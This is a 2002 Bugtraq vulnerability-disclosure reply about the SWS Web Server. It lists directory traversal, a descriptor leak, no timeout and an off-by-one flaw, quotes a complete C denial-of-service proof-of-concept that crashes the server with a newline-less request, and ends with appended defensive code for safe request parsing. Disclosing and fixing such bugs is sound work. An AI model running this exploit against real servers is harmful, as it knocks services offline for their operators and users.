Re: SWS Web Server v0.1.0 Exploit
Dear saman@xxxxxxxx,
I don't believe this is the largest problem of this "webserver"... There are
a lot of others:
1. Directory traversal (../) (it never drops the root privileges it needs to
bind to TCP/80).
2. It never closes the file descriptor for the 404 document, so it can be used to
DoS the remote system completely by repeating the request for a nonexistent
document.
3. It allows only 1 connection at a time and never times out.
4. If recv() fails it will overwrite 1 byte before the allocated buffer and
repeat the previous query. If the first recv() fails it will try to do some
action on uninitialized heap data.
One should be completely nuts to use it because there are too many bugs
for 130 lines of code :)
--Monday, September 2, 2002, 10:04:23 PM, you wrote to bugtraq@xxxxxxxxxxxxxxxxx:
shc> /*
shc> * Mon Sep 2 17:45:04 2002
shc> *
shc> * |SaMaN| aka Mert <saman@xxxxxxxx>
shc> *
shc> * Information : Anyone can kill SWS Web Server v0.1.0 remotely.
shc> *
shc> * Proof of Concept Exploit for SWS Web Server v0.1.0
shc> *
shc> * SWS homepage : http://www.linuxprogramlama.com
shc> *
shc> * Tested on : Slackware 8.1 - 2.4.18
shc> * : Redhat 7.0 - 2.2.16-22
shc> *
shc> * Problem : sws_web_server.c
shc> * : line 108
shc> * : if (recvBuffer[i - 1] != '\n') break;
shc> *
shc> * Q : So what will happen when we send a string not ending with '\n'?
shc> * A : break break break
shc> * Q : So root should restart the web server every time?
shc> * A : Yes
shc> * Q : Do other web servers act like this?
shc> * A : No
shc> * Q : So something is wrong?
shc> * A : Yes :)
shc> *
shc> */
shc> #include <stdio.h>
shc> #include <stdlib.h>
shc> #include <unistd.h>
shc> #include <errno.h>
shc> #include <string.h>
shc> #include <netdb.h>
shc> #include <sys/types.h>
shc> #include <netinet/in.h>
shc> #include <sys/socket.h>
shc> #define K "\033[1;31m"
shc> #define Y "\033[1;32m"
shc> #define SA "\033[1;33m"
shc> #define M "\033[1;34m"
shc> #define PORT 80
shc> int main(int argc, char *argv[])
shc> {
shc> int sockfd, numbytes;
shc> struct hostent *adres;
shc> struct sockaddr_in hedef;
shc> char buf[8] = "|SaMaN|";
shc> if (argc != 2) {
shc> printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
shc> printf("%sSWS Web Killer (saman@xxxxxxxx) \n", SA);
shc> printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
shc> printf("%sUsage: ./sws_web_killer %s<IP> \n",Y,M);
shc> return 0;
shc> }
shc> if ((adres=gethostbyname(argv[1])) == NULL) {
shc> perror("gethostbyname");
shc> exit(1);
shc> }
shc> if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
shc> perror("socket");
shc> exit(1);
shc> }
shc> hedef.sin_family = AF_INET;
shc> hedef.sin_port = htons(PORT);
shc> hedef.sin_addr = *((struct in_addr *)adres->h_addr);
shc> memset(&(hedef.sin_zero), '\0', 8);
shc> if (connect(sockfd, (struct sockaddr *)&hedef,
shc> sizeof(struct sockaddr)) == -1)
shc> {
shc> perror("connect");
shc> exit(1);
shc> }
shc> if ((numbytes=send(sockfd, buf, strlen(buf), 0)) == -1) {
shc> perror("send");
shc> exit(1);
shc> }
shc> close(sockfd);
shc> return 0;
shc> }
--
~/ZARAZA
So this road is cheaper and easier to reach
for anyone who is in a position to reach it. (Twain)
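As an added illustration (not code from the SWS server or from either poster), here is a request-line reader that avoids the failure modes listed in the reply and in the PoC header: it only looks at buf[i - 1] after a byte has actually arrived, treats recv() returning 0 or -1 as the end of the request instead of acting on uninitialized data, times out an idle client, and rejects ".." path components. The return codes, function names and the socketpair harness are my own constructs; the harness feeds the PoC's 7-byte newline-less request through the reader to show it fails cleanly.

```c
#include <errno.h>
#include <poll.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
enum { REQ_OK = 0, REQ_TIMEOUT = -1, REQ_CLOSED = -2, REQ_TOO_LONG = -3, REQ_ERROR = -4 };
/* Read one request line (through '\n') into buf, NUL-terminated. buf[i - 1] is examined
 * only after a byte has arrived (i >= 1); recv() returning 0 or -1 ends the request rather
 * than being acted on; timeout_ms of silence fails it so an idle client cannot pin the server. */
int read_request_line(int fd, char *buf, size_t cap, int timeout_ms)
{
    for (size_t i = 0; i + 1 < cap; ) {          /* keep room for the NUL */
        struct pollfd p = { fd, POLLIN, 0 };
        int r = poll(&p, 1, timeout_ms);
        if (r == 0) return REQ_TIMEOUT;
        if (r < 0) { if (errno == EINTR) continue; return REQ_ERROR; }
        ssize_t n = recv(fd, buf + i, 1, 0);     /* one byte: never reads past '\n' */
        if (n == 0) return REQ_CLOSED;           /* peer hung up before '\n' */
        if (n < 0) { if (errno == EINTR) continue; return REQ_ERROR; }
        i += (size_t)n;
        if (buf[i - 1] == '\n') { buf[i] = '\0'; return REQ_OK; }
    }
    return REQ_TOO_LONG;
}

int path_is_safe(const char *path)   /* reject a (URL-decoded) path with a ".." component */
{
    if (path[0] != '/') return 0;
    for (const char *p = path; *p; ) {
        const char *seg = p;
        while (*p && *p != '/') p++;
        if (p - seg == 2 && seg[0] == '.' && seg[1] == '.') return 0;
        if (*p == '/') p++;
    }
    return 1;
}
/* Demo harness (constructed for this example): push input through a socketpair, optionally
 * half-close the writer as the PoC does, and return the verdict; the line read lands in last_line. */
char last_line[128];
int simulate_request(const char *input, int close_writer, int timeout_ms)
{
    int sv[2], rc = REQ_ERROR;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return rc;
    if (send(sv[1], input, strlen(input), 0) == (ssize_t)strlen(input)) {
        if (close_writer) { close(sv[1]); sv[1] = -1; }
        rc = read_request_line(sv[0], last_line, sizeof last_line, timeout_ms);
    }
    close(sv[0]); if (sv[1] != -1) close(sv[1]);
    return rc;
}
```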